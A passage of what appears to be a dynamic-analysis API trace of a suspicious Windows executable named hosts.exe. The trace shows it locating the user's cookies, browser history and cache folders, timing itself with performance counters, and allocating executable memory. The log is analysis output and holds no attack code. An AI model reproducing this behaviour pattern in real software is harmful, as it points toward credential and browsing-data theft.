(Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.716] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x28fa90*=0x0) returned 0x24 [0171.716] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0171.716] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0171.716] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0171.716] SysReAllocStringLen (in: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x28fd64*="c:\\program files (x86)\\common files\\") returned 1 [0171.716] SysReAllocStringLen (in: pbstr=0x33e25cc*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x33e25cc*="c:\\program files (x86)\\common files\\") returned 1 [0171.716] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0171.720] SysReAllocStringLen (in: pbstr=0x28fd54*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fd54*="C:\\Users\\kEecfMwgj\\Pictures") returned 1 [0171.721] SysReAllocStringLen (in: pbstr=0x28fd58*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0171.721] GetThreadLocale () returned 0x409 [0171.721] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.721] GetThreadLocale () returned 0x409 [0171.721] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.721] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\", lpFilePart=0x28fa90*=0x0) returned 0x1c [0171.721] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0171.721] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0171.721] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures\\", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\pictures\\") returned 0x1c [0171.721] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x28fd58*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0171.721] SysReAllocStringLen (in: pbstr=0x33e25d0*=0x0, psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x33e25d0*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0171.722] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0171.736] SysReAllocStringLen (in: pbstr=0x28fd48*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fd48*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0171.736] SysReAllocStringLen (in: pbstr=0x28fd4c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0171.736] GetThreadLocale () returned 0x409 [0171.737] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.737] GetThreadLocale () returned 0x409 [0171.737] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.737] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x28fa90*=0x0) returned 0x3b [0171.737] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0171.737] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0171.737] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x3b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 0x3b [0171.737] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x28fd4c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0171.737] SysReAllocStringLen (in: pbstr=0x33e25d4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x33e25d4*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0171.737] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0171.746] SysReAllocStringLen (in: pbstr=0x28fd3c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fd3c*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0171.746] SysReAllocStringLen (in: pbstr=0x28fd40*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0171.746] GetThreadLocale () returned 0x409 [0171.746] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.746] GetThreadLocale () returned 0x409 [0171.746] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.746] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x28fa90*=0x0) returned 0x3d [0171.746] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0171.746] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0171.746] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x3d | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x3d [0171.747] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x28fd40*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0171.747] SysReAllocStringLen (in: pbstr=0x33e25d8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x33e25d8*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0171.747] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0171.751] SysReAllocStringLen (in: pbstr=0x28fd30*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fd30*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0171.752] SysReAllocStringLen (in: pbstr=0x28fd34*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0171.752] GetThreadLocale () returned 0x409 [0171.752] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.752] GetThreadLocale () returned 0x409 [0171.752] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.752] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x28fa90*=0x0) returned 0x4c [0171.752] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0171.752] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0171.752] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x4c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x4c [0171.752] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x28fd34*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0171.753] SysReAllocStringLen (in: pbstr=0x33e25dc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x33e25dc*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0171.753] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0171.896] SysReAllocStringLen (in: pbstr=0x28fd24*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fd24*="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0171.902] SysReAllocStringLen (in: pbstr=0x28fd28*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0171.902] GetThreadLocale () returned 0x409 [0171.902] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.902] GetThreadLocale () returned 0x409 [0171.902] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.902] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", lpFilePart=0x28fa90*=0x0) returned 0x23 [0171.902] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0171.902] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0171.902] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchLength=0x23 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 0x23 [0171.902] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x28fd28*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0171.903] SysReAllocStringLen (in: pbstr=0x33e25e0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x33e25e0*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0171.903] VirtualFree (lpAddress=0x33f4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0171.904] GetVersion () returned 0x1db10106 [0171.905] GetCurrentProcessId () returned 0xb48 [0171.905] GetCurrentProcess () returned 0xffffffff [0171.905] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0171.905] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0171.905] GetCommandLineW () returned="C:\\windows\\hosts.exe " [0171.905] GetCommandLineW () returned="C:\\windows\\hosts.exe " [0171.905] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.906] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\windows\\hosts.exe", NtPathName=0x28fcd8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\windows\\hosts.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.906] NtCreateFile (in: FileHandle=0x28fce8, DesiredAccess=0x80100080, ObjectAttributes=0x28fcbc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x28fce0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x28fce8*=0xfc, IoStatusBlock=0x28fce0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0171.906] RtlFreeAnsiString (AnsiString="\\") [0171.906] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0171.907] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fef0, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fef0*) returned 0x0 [0172.151] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0172.151] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fedc, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fedc*) returned 0x0 [0172.151] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0172.151] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdfc, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdfc*) returned 0x0 [0172.151] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0172.152] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0172.152] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0172.152] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0172.152] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0172.152] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0172.152] NtClose (Handle=0xfc) returned 0x0 [0172.156] GetLastError () returned 0x0 [0172.156] SetLastError (dwErrCode=0x0) [0172.156] GetLastError () returned 0x0 [0172.157] SetLastError (dwErrCode=0x0) [0172.157] GetLastError () returned 0x0 [0172.157] SetLastError (dwErrCode=0x0) [0172.157] GetLastError () returned 0x0 [0172.157] SetLastError (dwErrCode=0x0) [0172.174] GetCurrentThreadId () returned 0xa9c [0172.174] VirtualAlloc (lpAddress=0x33f4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0x33f4000 [0172.185] GetTickCount () returned 0x1d12f19 [0172.185] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065779227305) returned 1 [0172.185] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065779242823) returned 1 [0172.185] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065779258036) returned 1 [0172.185] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065779271056) returned 1 [0172.185] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065779283166) returned 1 [0172.186] Sleep (dwMilliseconds=0x0) [0172.354] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065796156391) returned 1 [0172.354] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065796174166) returned 1 [0172.354] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065796186819) returned 1 [0172.355] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065796201699) returned 1 [0172.355] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065796216971) returned 1 [0172.355] Sleep (dwMilliseconds=0x0) [0172.554] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065816176927) returned 1 [0172.554] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065816190351) returned 1 [0172.555] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065816204866) returned 1 [0172.555] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065816218107) returned 1 [0172.555] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065816233068) returned 1 [0172.555] Sleep (dwMilliseconds=0x0) [0172.723] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065833021287) returned 1 [0172.723] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065833038685) returned 1 [0172.723] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065833066425) returned 1 [0172.724] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065833127040) returned 1 [0172.724] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3065833143970) returned 1 [0172.724] Sleep (dwMilliseconds=0x0) [0172.794] GetTickCount () returned 0x1d1317a [0172.794] VirtualFree (lpAddress=0x3414000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0172.796] GetLastError () returned 0x0 [0172.796] SetLastError (dwErrCode=0x0) [0172.796] GetLastError () returned 0x0 [0172.796] SetLastError (dwErrCode=0x0) [0172.796] GetLastError () returned 0x0 [0172.797] SetLastError (dwErrCode=0x0) [0172.797] GetLastError () returned 0x0 [0172.797] SetLastError (dwErrCode=0x0) [0172.797] GetLastError () returned 0x0 [0172.797] SetLastError (dwErrCode=0x0) [0172.797] GetLastError () returned 0x0 [0172.797] SetLastError (dwErrCode=0x0) [0172.798] GetLastError () returned 0x0 [0172.798] SetLastError (dwErrCode=0x0) [0172.798] GetLastError () returned 0x0 [0172.798] SetLastError (dwErrCode=0x0) [0172.798] GetLastError () returned 0x0 [0172.798] SetLastError (dwErrCode=0x0) [0172.798] GetLastError () returned 0x0 [0172.798] SetLastError (dwErrCode=0x0) [0172.799] GetLastError () returned 0x0 [0172.799] SetLastError (dwErrCode=0x0) [0172.799] GetLastError () returned 0x0 [0172.799] SetLastError (dwErrCode=0x0) [0172.799] GetLastError () returned 0x0 [0172.799] SetLastError (dwErrCode=0x0) [0172.799] GetLastError () returned 0x0 [0172.800] SetLastError (dwErrCode=0x0) [0172.800] GetLastError () returned 0x0 [0172.800] SetLastError (dwErrCode=0x0) [0172.800] GetLastError () returned 0x0 [0172.800] SetLastError (dwErrCode=0x0) [0172.800] GetLastError () returned 0x0 [0172.801] SetLastError (dwErrCode=0x0) [0172.801] GetLastError () returned 0x0 [0172.801] SetLastError (dwErrCode=0x0) [0172.801] GetLastError () returned 0x0 [0172.801] SetLastError (dwErrCode=0x0) [0172.802] GetLastError () returned 0x0 [0172.802] SetLastError (dwErrCode=0x0) [0172.802] GetLastError () returned 0x0 [0172.802] SetLastError (dwErrCode=0x0) [0172.802] GetLastError () returned 0x0 [0172.803] SetLastError (dwErrCode=0x0) [0172.803] GetLastError () returned 0x0 [0172.803] SetLastError (dwErrCode=0x0) [0172.805] GetLastError () returned 0x0 [0172.805] SetLastError (dwErrCode=0x0) [0172.805] GetLastError () returned 0x0 [0172.805] SetLastError (dwErrCode=0x0) [0172.807] GetLastError () returned 0x0 [0172.808] SetLastError (dwErrCode=0x0) [0172.808] GetLastError () returned 0x0 [0172.808] SetLastError (dwErrCode=0x0) [0172.809] GetLastError () returned 0x0 [0172.809] SetLastError (dwErrCode=0x0) [0172.809] GetLastError () returned 0x0 [0172.809] SetLastError (dwErrCode=0x0) [0172.809] GetLastError () returned 0x0 [0172.810] SetLastError (dwErrCode=0x0) [0172.810] GetLastError () returned 0x0 [0172.810] SetLastError (dwErrCode=0x0) [0172.810] GetLastError () returned 0x0 [0172.810] SetLastError (dwErrCode=0x0) [0172.810] GetLastError () returned 0x0 [0172.811] SetLastError (dwErrCode=0x0) [0172.811] GetLastError () returned 0x0 [0172.811] SetLastError (dwErrCode=0x0) [0172.811] VirtualAlloc (lpAddress=0x3414000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3414000 [0172.812] GetLastError () returned 0x0 [0172.812] SetLastError (dwErrCode=0x0) [0172.812] GetLastError () returned 0x0 [0172.812] SetLastError (dwErrCode=0x0) [0172.813] GetLastError () returned 0x0 [0172.813] SetLastError (dwErrCode=0x0) [0172.813] GetLastError () returned 0x0 [0172.813] SetLastError (dwErrCode=0x0) [0172.813] GetLastError () returned 0x0 [0172.813] SetLastError (dwErrCode=0x0) [0172.813] GetLastError () returned 0x0 [0172.814] SetLastError (dwErrCode=0x0) [0172.814] GetLastError () returned 0x0 [0172.814] SetLastError (dwErrCode=0x0) [0172.817] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0172.817] GetLastError () returned 0x0 [0172.818] SetLastError (dwErrCode=0x0) [0172.818] GetLastError () returned 0x0 [0172.818] SetLastError (dwErrCode=0x0) [0172.818] GetLastError () returned 0x0 [0172.818] SetLastError (dwErrCode=0x0) [0172.818] GetLastError () returned 